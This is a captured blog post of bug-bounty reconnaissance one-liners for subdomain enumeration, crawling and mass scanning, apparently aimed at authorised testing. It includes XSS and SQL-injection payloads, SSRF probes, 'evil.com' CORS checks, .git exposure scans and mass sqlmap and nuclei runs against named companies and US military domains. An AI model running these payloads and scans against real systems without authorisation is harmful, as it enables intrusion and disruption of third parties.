reconshell.com
Open in
urlscan Pro
18.159.80.129
Public Scan
Submitted URL: https://t.co/c49iQqdPpz
Effective URL: https://reconshell.com/king-of-bug-bounty/
Submission: On December 13 via api from US — Scanned from DE
Effective URL: https://reconshell.com/king-of-bug-bounty/
Submission: On December 13 via api from US — Scanned from DE
Form analysis
5 forms found in the DOMGET https://reconshell.com/
<form role="search" method="get" class="search-form" action="https://reconshell.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>
GET https://reconshell.com/
<form role="search" method="get" class="search-form" action="https://reconshell.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>
GET https://reconshell.com/
<form role="search" method="get" class="search-form" action="https://reconshell.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>
GET https://reconshell.com/
<form role="search" method="get" class="search-form" action="https://reconshell.com/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>
POST https://reconshell.com/wp-comments-post.php
<form action="https://reconshell.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate="">
<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p>
<p class="comment-form-comment"><label for="comment">Comment</label> <textarea placeholder="Leave Your Comment" id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p>
<p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input placeholder="Name" id="author" name="author" type="text" value="" size="30" maxlength="245" required="required"></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input placeholder="Email" id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" required="required">
</p>
<p class="comment-form-url"><label for="url">Website</label> <input placeholder="Website" id="url" name="url" type="url" value="" size="30" maxlength="200"></p>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time
I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="btn-wrap" value="Post Comment"> <input type="hidden" name="comment_post_ID" value="7158" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
</form>
Text Content
Verstanden! Wir verwenden Cookies um Inhalte und Anzeigen zu personalisieren, um Social-Media-Funktionen zur Verfügung zu stellen und unseren Traffic zu analysieren. Wir teilen auch Informationen über Ihre Nutzung unserer Website mit unseren Social Media-, Werbe- und Analysepartnern. Details anzeigen Cookie Consent plugin for the EU cookie law * Data Science * Artificial Intelligence * Data Analyst * Deep Learning * Machine Learning * Kali * Exploits * OSINT * Tools * Bug Bounty * Resources * Linux * DevOps * Docker * Kubernetes * Git * Forensics * Cyber Forensics * Digital Forensics * Linux Forensics * Network Forensics * Threat Analyst * Incident Response * SQL * CVE * Share * News * Services * CrackMyHash * Small Business * Resources * White Papers * Crypto News * Programming * Python * NodeJS * Java * Javascript * PHP * Android * SEO * Microsoft * Azure * Dot Net * Powershell * Networking Search for: Search for: * Data Science * Artificial Intelligence * Data Analyst * Deep Learning * Machine Learning MACHINE LEARNING & DEEP LEARNING TUTORIALS AWESOME PYTHON DATA SCIENCE DATA SCIENCE INTERVIEW QUESTIONS AND ANSWERS DATA SCIENCE CHEAT SHEET Previous Next * Kali * Exploits * OSINT * Tools * Bug Bounty * Resources CYBER SECURITY BLUE TEAM KING OF BUG BOUNTY MOBILE HACKERS WEAPONS APACHE LOG4J2 VULNERABILITY PATCH Previous Next * Linux * DevOps * Docker * Kubernetes * Git CLOUD DEVSECOPS LEARNING BEST DOCKER RESOURCES KUBERNETES CLUSTER IN 30 MINS LINUX COMMANDS AND SHELL SCRIPTING NOTES Previous Next * Forensics * Cyber Forensics * Digital Forensics * Linux Forensics * Network Forensics * Threat Analyst * Incident Response AWESOME THREAT INTELLIGENCE INCIDENT RESPONSE RESOURCES CYBER THREAT INTEL WEEK 21 HOMEWORK DIGITAL FORENSICS Previous Next * SQL AWESOME POSTGRESQL MYSQL – RDBMS INTERVIEW QUESTIONS FREE INTRODUCTION TO SQL AWESOME SQL CODES SQL INTERVIEW QUESTIONS AND ANSWERS Previous Next * CVE * Share * News * Services * CrackMyHash Search for: * Data Science * Artificial Intelligence * Data Analyst * Deep Learning * Machine Learning MACHINE LEARNING & DEEP LEARNING TUTORIALS AWESOME PYTHON DATA SCIENCE DATA SCIENCE INTERVIEW QUESTIONS AND ANSWERS DATA SCIENCE CHEAT SHEET Previous Next * Kali * Exploits * OSINT * Tools * Bug Bounty * Resources CYBER SECURITY BLUE TEAM KING OF BUG BOUNTY MOBILE HACKERS WEAPONS APACHE LOG4J2 VULNERABILITY PATCH Previous Next * Linux * DevOps * Docker * Kubernetes * Git CLOUD DEVSECOPS LEARNING BEST DOCKER RESOURCES KUBERNETES CLUSTER IN 30 MINS LINUX COMMANDS AND SHELL SCRIPTING NOTES Previous Next * Forensics * Cyber Forensics * Digital Forensics * Linux Forensics * Network Forensics * Threat Analyst * Incident Response AWESOME THREAT INTELLIGENCE INCIDENT RESPONSE RESOURCES CYBER THREAT INTEL WEEK 21 HOMEWORK DIGITAL FORENSICS Previous Next * SQL AWESOME POSTGRESQL MYSQL – RDBMS INTERVIEW QUESTIONS FREE INTRODUCTION TO SQL AWESOME SQL CODES SQL INTERVIEW QUESTIONS AND ANSWERS Previous Next * CVE * Share * News * Services * CrackMyHash Search for: Bug Bounty KING OF BUG BOUNTY Posted by Emma White December 12, 2021 0 Shares READ NEXT AWESOME DEVSECOPS Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. -------------------------------------------------------------------------------- SCRIPTS THAT NEED TO BE INSTALLED To run the project, you will need to install the following programs: * Amass * Anew * Anti-burl * Assetfinder * Axiom * Bhedak * CF-check * Chaos * Cariddi * Dalfox * DNSgen * Filter-resolved * Findomain * Fuff * Gargs * Gau * Gf * Github-Search * Gospider * Gowitness * Hakrawler * HakrevDNS * Haktldextract * Haklistgen * Html-tool * Httpx * Jaeles * Jsubfinder * Kxss * LinkFinder * Metabigor * MassDNS * Naabu * Qsreplace * Rush * SecretFinder * Shodan * ShuffleDNS * SQLMap * Subfinder * SubJS * Unew * WaybackURLs * Wingman * Notify * Goop * Tojson * GetJS * X8 * Unfurl * XSStrike * Page-fetch BBRF SCOPE DOD bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' BHEDAK * Explained command cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" .BASHRC SHORTCUT OFJAAAH reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ONELINER HAKLISTGEN * @hakluke subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; RUNNING JAVASCRIPT ON EACH PAGE SEND TO PROXY. * Explained command cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 RUNNING CARIDDI TO CRAWLER * Explained command echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive DALFOX SCAN TO BUGBOUNTY TARGETS. * Explained command xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' DALFOX SCAN TO BUGBOUNTY TARGETS. * Explained command wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ USING X8 TO HIDDEN PARAMETERS DISCOVERY * Explaining command assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' EXTRACT .JS SUBDOMAINS * Explaining command echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 GOOP TO SEARCH .GIT FILES. * Explaining command xargs -a xss -P10 -I@ sh -c 'goop @' USING CHAOS LIST TO ENUMERATE ENDPOINT curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' USING WINGMAN TO SEARCH XSS REFLECT / DOM XSS * Explaining command xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' SEARCH ASN TO METABIGOR AND RESOLVERS DOMAIN * Explaining command echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ONELINERS SEARCH .JSON GOSPIDER FILTER ANTI-BURL * Explaining command gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl SEARCH .JSON SUBDOMAIN * Explaining command assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew SONARDNS EXTRACT SUBDOMAINS * Explaining command wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar KXSS TO SEARCH PARAM XSS * Explaining command echo http://testphp.vulnweb.com/ | waybackurls | kxss RECON SUBDOMAINS AND GAU TO SEARCH VULS DALFOX * Explaining command assetfinder testphp.vulnweb.com | gau | dalfox pipe RECON SUBDOMAINS AND SCREENSHOT TO URL USING GOWITNESS * Explaining command assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' EXTRACT URLS TO SOURCE CODE COMMENTS * Explaining command cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' AXIOM RECON “COMPLETE” * Explaining command findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u DOMAIN SUBDOMAIN EXTRACTION * Explaining command cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' SEARCH .JS USING * Explaining command assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew THIS ONE WAS HUGE … BUT IT COLLECTS .JS GAU + WAYBACK + GOSPIDER AND MAKES AN ANALYSIS OF THE JS. TOOLS YOU NEED BELOW. * Explaining command cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' MY RECON AUTOMATION SIMPLE. OFJAAAH.SH * Explaining command chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 DOWNLOAD ALL DOMAINS TO BOUNTY CHAOS * Explaining command curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' RECON TO SEARCH SSRF TEST * Explaining command findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net SHUFFLEDNS TO DOMAINS IN FILE SCAN NUCLEI. * Explaining command xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 SEARCH ASN AMASS * Explaining command Amass intel will search the organization “paypal” from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld’s in that IP space (paypal.com, paypal.co.id, paypal.me) amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' SQLINJECTION MASS DOMAIN FILE * Explaining command httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' USING CHAOS SEARCH JS * Explaining command Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of “att.com”. We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for “(http|https)://att.com” to make sure we dont recieve output for domains that are not “att.com”. chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] SEARCH SUBDOMAIN USING GOSPIDER * Explaining command GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew USING GOSPIDER TO CHAOS * Explaining command GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' USING RECON.DEV AND GOSPIDER CRAWLER SUBDOMAINS * Explaining command We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew PSQL – SEARCH SUBDOMAIN USING CERT.SH * Explaining command Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew SEARCH SUBDOMAINS USING GITHUB AND HTTPX * Github-search Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title SEARCH SQLINJECTION USING QSREPLACE SEARCH SYNTAX ERROR * Explained command grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" SEARCH SUBDOMAINS USING JLDC * Explained command curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew SEARCH SUBDOMAINS IN ASSETFINDER USING HAKRAWLER SPIDER TO SEARCH LINKS IN CONTENT RESPONSES * Explained command assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" SEARCH SUBDOMAINS IN CERT.SH * Explained command curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew SEARCH SUBDOMAINS IN CERT.SH ASSETFINDER TO SEARCH IN LINK /.GIT/HEAD * Explained command curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew COLLECT JS FILES FROM HOSTS UP BY GOSPIDER * Explained command xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' SUBDOMAIN SEARCH BUFFEROVER RESOLVING DOMAIN TO HTTPX * Explained command curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew USING GARGS TO GOSPIDER SEARCH WITH PARALLEL PROCCESS * Gargs * Explained command httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne INJECTION XSS USING QSREPLACE TO URLS FILTER TO GOSPIDER * Explained command gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' EXTRACT URL’S TO APK * Explained command apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" CHAOS TO GOSPIDER * Explained command chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ CHECKING INVALID CERTIFICATE * Real script * Script King xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx USING SHODAN & NUCLEI * Explained command Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ OPEN REDIRECT TEST USING GF. * Explained command echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don’t already appear in the file. Outputs new lines to stdout too, removes duplicates. echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew USING SHODAN TO JAELES “HOW DID I FIND A CRITICAL TODAY? WELL AS I SAID IT WAS VERY SIMPLE, USING SHODAN AND JAELES”. * Explained command shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ USING CHAOS TO JAELES “HOW DID I FIND A CRITICAL TODAY?. * Explained command To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ USING SHODAN TO JAELES * Explained command domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts SEARCH TO FILES USING ASSETFINDER AND FFUF * Explained command assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' HTTPX USING NEW MODE LOCATION AND INJECTION XSS USING QSREPLACE. * Explained command httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' GRAP INTERNAL JUICY PATHS AND DO REQUESTS TO THEM. * Explained command export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' DOWNLOAD TO LIST BOUNTY TARGETS WE INJECT USING THE SED .GIT/HEAD COMMAND AT THE END OF EACH URL. * Explained command wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew USING TO FINDOMAIN TO SQLINJECTION. * Explained command findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 JAELES SCAN TO BUGBOUNTY TARGETS. * Explained command wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ JLDC DOMAIN SEARCH SUBDOMAIN, USING RUSH AND JAELES. * Explained command curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' CHAOS TO SEARCH SUBDOMAINS CHECK CLOUDFLAREIP SCAN PORT. * Explained command chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent SEARCH JS TO DOMAINS FILE. * Explained command cat FILE TO TARGET | httpx -silent | subjs | anew SEARCH JS USING ASSETFINDER, RUSH AND HAKRAWLER. * Explained command assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" SEARCH TO CORS USING ASSETFINDER AND RUSH * Explained command assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' SEARCH TO JS USING HAKRAWLER AND RUSH & UNEW * Explained command cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' XARGS TO DIRSEARCH BRUTE FORCE. * Explained command cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ASSETFINDER TO RUN MASSDNS. * Explained command assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent EXTRACT PATH TO JS * Explained command cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u FIND SUBDOMAINS AND SECRETS WITH JSUBFINDER * Explained command cat subdomsains.txt | httpx --silent | jsubfinder -s SEARCH DOMAINS TO RANGE-IPS. * Explained command cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew SEARCH NEW’S DOMAINS USING DNSGEN. * Explained command xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain LIST IPS, DOMAIN EXTRACT, USING AMASS + WORDLIST * Explained command amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt SEARCH DOMAINS USING AMASS AND SEARCH VUL TO NUCLEI. * Explained command amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 VERIFY TO CERT USING OPENSSL. * Explained command sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) SEARCH DOMAINS USING OPENSSL TO CERT. * Explained command xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew SEARCH TO HACKERS. * Censys * Spyce * Shodan * Viz Grey * Zoomeye * Onyphe * Wigle * Intelx * Fofa * Hunter * Zorexeye * Pulsedive * Netograph * Vigilante * Pipl * Abuse * Cert-sh * Maltiverse * Insecam * Anubis * Dns Dumpster * PhoneBook * Inquest * Scylla -------------------------------------------------------------------------------- Github Link Mobile Hackers Weapons Tags: AppSec bug hunter bugbounty HackingTools inforsec SSRF XSS 0 Shares Share on Facebook Share on Twitter Share on Pinterest Share on Email Emma White December 12, 2021 Previous Article IOTA Price Prediction Next Article Cloud DevSecOps Learning LEAVE A REPLY LEAVE A REPLY CANCEL REPLY Your email address will not be published. Required fields are marked * Comment Name * Email * Website Save my name, email, and website in this browser for the next time I comment. REPORT THIS ADLATEST POSTS CYBER SECURITY BLUE TEAM December 13, 2021 VECHAIN PRICE PREDICTION December 13, 2021 CLOUD DEVSECOPS LEARNING December 12, 2021 IOTA PRICE PREDICTION December 12, 2021 report this ad report this ad YOU MIGHT ALSO ENJOY Threat Analyst AWESOME THREAT INTELLIGENCE December 9, 2021 Tools WEB HACKERS WEAPONS December 5, 2021 Tools ANDROID SECURITY RESOURCES December 4, 2021 Tools PENETRATION TESTING CHEAT SHEET November 30, 2021 Load More * ABOUT * ADVERTISEMENT * TEAM * JOBS * CONTACT * PRIVACY POLICY * DISCLOSURE © 2021 Reconshell All Rights 